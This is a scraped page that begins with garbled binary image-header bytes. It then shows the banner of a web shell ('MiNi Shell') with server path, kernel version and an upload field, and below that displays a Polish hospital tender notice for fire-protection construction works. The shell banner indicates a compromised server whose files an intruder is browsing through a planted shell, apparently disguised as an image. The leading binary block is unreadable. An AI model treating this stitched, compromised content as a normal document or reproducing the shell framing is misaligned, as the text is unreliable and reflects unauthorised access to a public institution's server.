JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211105/0025921701-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przystosowanie budynku SPZOZ w Szamotułach do obowiązujących wymagań w zakresie ochrony przeciwpożarowej. ETAP I, wydzielenie klatek schodowych i dróg ewakuacyjnych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Samodzielny Publiczny Zakład Opieki Zdrowotnej w Szamotułach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000553822</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sukiennicza</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szamotuły</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL418 - Poznański</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">612927118</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">612927102</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@szamotuly.med.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szamotuly.med.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przystosowanie budynku SPZOZ w Szamotułach do obowiązujących wymagań w zakresie ochrony przeciwpożarowej. ETAP I, wydzielenie klatek schodowych i dróg ewakuacyjnych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-692babf7-3e2e-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00259217</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00013696/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Przystosowanie budynku SPZOZ w Szamotułach do obowiązujących wymagań w zakresie ochrony przeciwpożarowej. ETAP I, wydzielenie klatek schodowych i dróg ewakuacyjnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://bip.spzoz.powiat-szamotuly.pl/zamowienia <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)<br/>Wpostępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami<br/>odbywasię przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/,<br/>ePUAPu,dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty<br/>elektronicznej:przetargi@szamotuly.med.pl2) Zamawiający wyznacza następujące osoby do kontaktu<br/>zWykonawcami w sprawach formalnych: Maria Stróżyk tel. + 48 61 29 27 118,<br/>email:przetargi@szamotuly.med.pl3) Wykonawca zamierzający wziąć udział w postępowaniu o<br/>udzieleniezamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na<br/>ePUAPma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty<br/>lubwniosku” oraz do „Formularza do komunikacji”.4) Wymagania techniczne i organizacyjne wysyłania<br/>iodbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń<br/>orazinformacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z<br/>systemuminiPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji<br/>publicznej(ePUAP).5) Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych<br/>formularzy:„Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji”<br/>wynosi 150MB.6) Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych,<br/>oświadczeńlub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się<br/>datę ichprzekazania na ePUAP.7) Niniejsze postępowanie można wyszukać również na Liście<br/>wszystkichpostępowań w systemie miniportal (https://miniportal.uzp.gov.pl/Postepowania) na liście<br/>wszystkichpostępowań w miniPortalu, klikając wcześniej opcję „Dla Wykonawców” lub ze strony<br/>głównej zzakładki Postępowania.8) Uwaga! Przed przystąpieniem do składania oferty, wykonawca<br/>jestzobowiązany zapoznać się z Instrukcją korzystania z miniportal i ePuap - stanowiącej zał. nr 6 do<br/>SWZ.Instrukcja została zamieszczona także bezpośrednio na<br/>portalu(https://miniportal.uzp.gov.pl/Instrukcje).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">2) administratorem Pani/Pana danych osobowych<br/>jest:SAMODZIELNY PUBLICZNY ZAKŁAD OPIEKI ZDROWOTNEJ W SZAMOTUŁACH;3)<br/>administratorwyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem<br/>e-mail:iod@szamotuly.med.pl&gt; Dane osobowe wykonawcy będą przetwarzane na podstawie art. 6 ust.<br/>1 lit. cRODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia<br/>publicznego pn.:„Dostawa środków dezynfekcyjnych dla SPZOZ w Szamotułach II”;4)Odbiorcami Pani /<br/>Pana danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostaniedokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11<br/>września 2019 r. –Prawo zamówień publicznych, jak również inne podmioty upoważnione do odbioru<br/>danych osobowychna podstawie przepisów prawa lub zawartych z Administratorem umów, w tym<br/>podmioty zajmujące sięobsługą informatyczną Administratora;5) Dane osobowe wykonawcy zawarte w<br/>protokolepostępowania będą przechowywane przez okres 4 lat, od dnia zakończenia postępowania o<br/>udzieleniezamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje<br/>cały czastrwania umowy; Z uwagi na ograniczenia techniczne nie ma możliwości wprowadzenia całej<br/>treściklauzuli. Kompleksowa treść klauzuli informacyjnej RODO została zawarta w rozdziale I, pkt 16<br/>swz.Prosimy o zapoznanie się z jej treścią</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">g) posiada Pani/Pan:− na podstawie art. 15 RODO<br/>prawodostępu do danych osobowych Pani/Pana dotyczących;− na podstawie art. 16 RODO prawo<br/>dosprostowania Pani/Pana danych osobowych **;− na podstawie art. 18 RODO prawo żądania<br/>odadministratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o<br/>którychmowa w art. 18 ust. 2 RODO ***;− prawo do wniesienia skargi do Prezesa Urzędu Ochrony<br/>DanychOsobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących<br/>naruszaprzepisy RODO;h) nie przysługuje Pani/Panu:− w związku z art. 17 ust. 3 lit. b, d lub e RODO<br/>prawo dousunięcia danych osobowych;− prawo do przenoszenia danych osobowych, o którym mowa w<br/>art. 20RODO;− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyżpodstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c<br/>RODO. **Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą<br/>wynikupostępowaniao udzielenie zamówienia publicznego ani zmianą postanowień umowy w<br/>zakresieniezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego<br/>załączników.***Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu<br/>doprzechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu<br/>ochronypraw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego<br/>UniiEuropejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-381-53/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 813008,13 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest robota budowlana pn. Przystosowanie budynku SPZOZ w<br/>Szamotułach do obowiązujących wymagań w zakresie ochrony przeciwpożarowej. ETAP I,<br/>wydzielenie klatek schodowych i dróg ewakuacyjnych <br/>2. Lokalizacja: Samodzielny Publiczny Zakład Opieki Zdrowotnej w Szamotułach, ul.<br/>Sukiennicza 13, <br/>64-500 Szamotuły<br/>3. Zakres przedmiotu zamówienia obejmuje prace modernizacyjne wydzielenia stref<br/>przeciwpożarowych i zabudowę klatek schodowych i dróg ewakuacyjnych w SPZOZ w<br/>Szamotułach.<br/>Dostosowaniu budynku szpitala do wymogów ppoż. w oparciu o wykonany projekt budowlany. <br/>Zakres opracowania obejmuje I etap przystosowania budynku do wymagań ochrony<br/>przeciwpożarowej polegającej na:<br/> zabudowie klatek schodowych i ich grawitacyjne oddymianie za pomocą klap dymowych,<br/> wymianie istniejących drzwi i okien na przeciwpożarowe w wydzielanych klatkach schodowych,<br/> wymianie okien na przeciwpożarowe znajdujących się na granicach stref pożarowych,<br/> montażu dodatkowych drzwi dymoszczelnych,<br/> instalacja i modernizacja oświetlenia awaryjnego i ewakuacyjnego,<br/> wykonanie wewnętrznej instalacji hydrantowej przeciwpożarowej i zaworu pierwszeństwa<br/> Wykonawca wykona zabezpieczenie przepustów instalacyjnych w elementach oddzielenia<br/>przeciwpożarowego (klatka schodowa) zgodnie z obowiązującymi przepisami.<br/>Projekt budowlany zawiera roboty w zakresie branży budowlanej, m.in:<br/> roboty murowe<br/> roboty elektryczne<br/> roboty hydrantowe<br/> konstrukcje z profili stalowych, montaż klap oddymiających<br/> wymiana i osadzanie nowych drzwi przeciwpożarowych, wymiana okien na przeciwpożarowe<br/> prace wykończeniowe, posadzki, tynki, okładziny, malowanie<br/> inne prace związane z wykonaniem przedmiotu zamówienia<br/>Po zakończeniu robót należy sporządzić protokoły z prób i sprawdzeń: <br/> instalacji oddymiającej<br/> instalacji oświetlenia awaryjnego i ewakuacyjnego z uwzględnieniem oznakowania zgodnego z<br/>obowiązującymi przepisami w tym zakresie <br/> instalacji oświetleniowej i elektrycznej<br/> instalacji hydrantowej z uwzględnieniem wydajności, ciśnienia i wykonanej próby szczelności<br/>węży hydrantowych<br/> zadziałania zaworu pierwszeństwa <br/> zabezpieczenia przepustów instalacyjnych<br/> inne wymagane obecnie obowiązującym prawem<br/>oraz sporządzić dokumentację powykonawczą w wersji papierowej oraz elektronicznej,<br/>zawierające wszystkie niezbędne instrukcje, karty gwarancyjne, wykaz serwisów wykaz<br/>wymaganych dokumentów dopuszczenia dla poszczególnych elementów urządzeń<br/>przeciwpożarowych np. zgodnie ze Standardem CNBOP-PIB Ochrona Przeciwpożarowa,<br/>Wprowadzenie do obrotu i użytkowania urządzeń przeciwpożarowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">42131160-5 - Hydranty</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45223210-1 - Roboty konstrukcyjne z wykorzystaniem stali</p> <p class="mb-0">45261320-3 - Kładzenie rynien</p> <p class="mb-0">45261410-1 - Izolowanie dachu</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45343000-3 - Roboty instalacyjne przeciwpożarowe</p> <p class="mb-0">45343200-5 - Instalowanie sprzętu gaśniczego</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7,5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 4) zdolności technicznej lub zawodowej:tj. wykażą, że do wykonania zamówienia skierują osoby<br/>spełniające co najmniej poniższe wymogi: <br/>a) Kierownik budowy - posiadający co najmniej uprawnienia do kierowania robotami<br/>budowlanymi bez ograniczeń w specjalności konstrukcyjno–budowlanej zgodnie z art. 12 ustawy<br/>z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz.U. z 2020 r. poz. 1333, z późn. zm.) lub<br/>odpowiadające im ważne uprawnienia budowlane, w zakresie pełnionej funkcji, które zostały<br/>wydane na podstawie wcześniej obowiązujących przepisów;<br/>b) Kierownik robót - posiadający co najmniej uprawnienia do kierowania robotami budowlanymi<br/>bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych,<br/>wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych zgodnie z art. 12 ustawy z dnia 7<br/>lipca 1994 r. Prawo budowlane (tj. Dz.U. z 2020 r. poz. 1333, z późn. zm.) lub odpowiadające im<br/>ważne uprawnienia budowlane, w zakresie pełnionej funkcji, które zostały wydane na podstawie<br/>wcześniej obowiązujących przepisów;<br/>c) Kierownik robót - posiadającym co najmniej uprawnienia do kierowania robotami budowlanymi<br/>bez ograniczeń w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych<br/>zgodnie z art. 12 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz.U. z 2020 r. poz. 1333, z<br/>późn. zm.) lub odpowiadające im ważne uprawnienia budowlane, w zakresie pełnionej funkcji,<br/>które zostały wydane na podstawie wcześniej obowiązujących przepisów;<br/>Zamawiający nie dopuszcza łączenia funkcji kierownika budowy z wymaganiami określonymi w<br/>lit a-c.<br/>W przypadku, gdy Wykonawca dysponuje lub będzie dysponował osobą, która nabyła<br/>uprawnienia poza granicami RP, osoba taka musi posiadać wykształcenie i kwalifikacje<br/>wymagane do świadczenia usług we wskazanej branży budowlanej w kraju zamieszkania tej<br/>osoby oraz posiadać decyzję o uznaniu kwalifikacji zawodowych we wskazanej branży<br/>budowlanej zgodnie z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji<br/>zawodowych nabytych w państwach Unii Europejskiej (tj. Dz.U. z 2020 r. poz. 220, późn. zm.)<br/>lub posiadać ważny wpis na listę członków izby zgodnie z ustawą z dnia 15 grudnia 2000 r. o<br/>samorządach zawodowych architektów oraz inżynierów budownictwa (tj. Dz.U. z 2019 r., poz.<br/>1117), wydane przez właściwą radę izby inżynierów budownictwa wraz z aktualnym<br/>zaświadczeniem o ubezpieczeniu od odpowiedzialności cywilnej wydanym przez właściwe Izby<br/>Inżynierów Budownictwa”.<br/>Odnośnie do wykonawców wspólnie ubiegających się o udzielenie zamówienia mogą oni<br/>polegać na zdolnościach tych z wykonawców, którzy wykonają roboty lub usługi, do realizacji<br/>których te zdolności są wymagane. <br/>W przypadku posługiwania się przez wykonawcę cudzym potencjałem, wykonawcy mogą<br/>polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty<br/>budowlane lub usługi, do realizacji których te zdolności są wymagane <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt. 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową albo<br/>oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dowodami potwierdzającymi, że<br/>przygotowanie oferty, oferty częściowej nastąpiło niezależnie od Wykonawcy należącego do tej samej<br/>Ogłoszenie nr 2021/BZP 00184226/01 z dnia 2021-09-17<br/>2021-09-17 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>grupy kapitałowej (potwierdzenie niepodlegania wykluczeniu</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2) Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia<br/>publicznego, <br/>w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie, wraz <br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia <br/>i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, w zakresie<br/>wymaganym w SWZ (spełnianie warunków udziału w postępowaniu)</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1) Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu<br/>składania ofert, wnieść wadium w kwocie: 9.700,- zł.<br/>2) Wadium musi obejmować pełen okres związania ofertą tj. 30 dni od upływu terminu składania<br/>ofert, z tym iż pierwszym dniem związania jest dzień wyznaczony do składania ofert.<br/>3) Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy<br/>Pzp.<br/>4) Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy w banku:<br/>Bank Spółdzielczy Duszniki O/Szamotuły, numer rachunku: 27 9072 0002 0450 0009 2000 0003<br/>5) Wadium musi wpłynąć na wskazany rachunek bankowy zamawiającego najpóźniej przed<br/>upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy 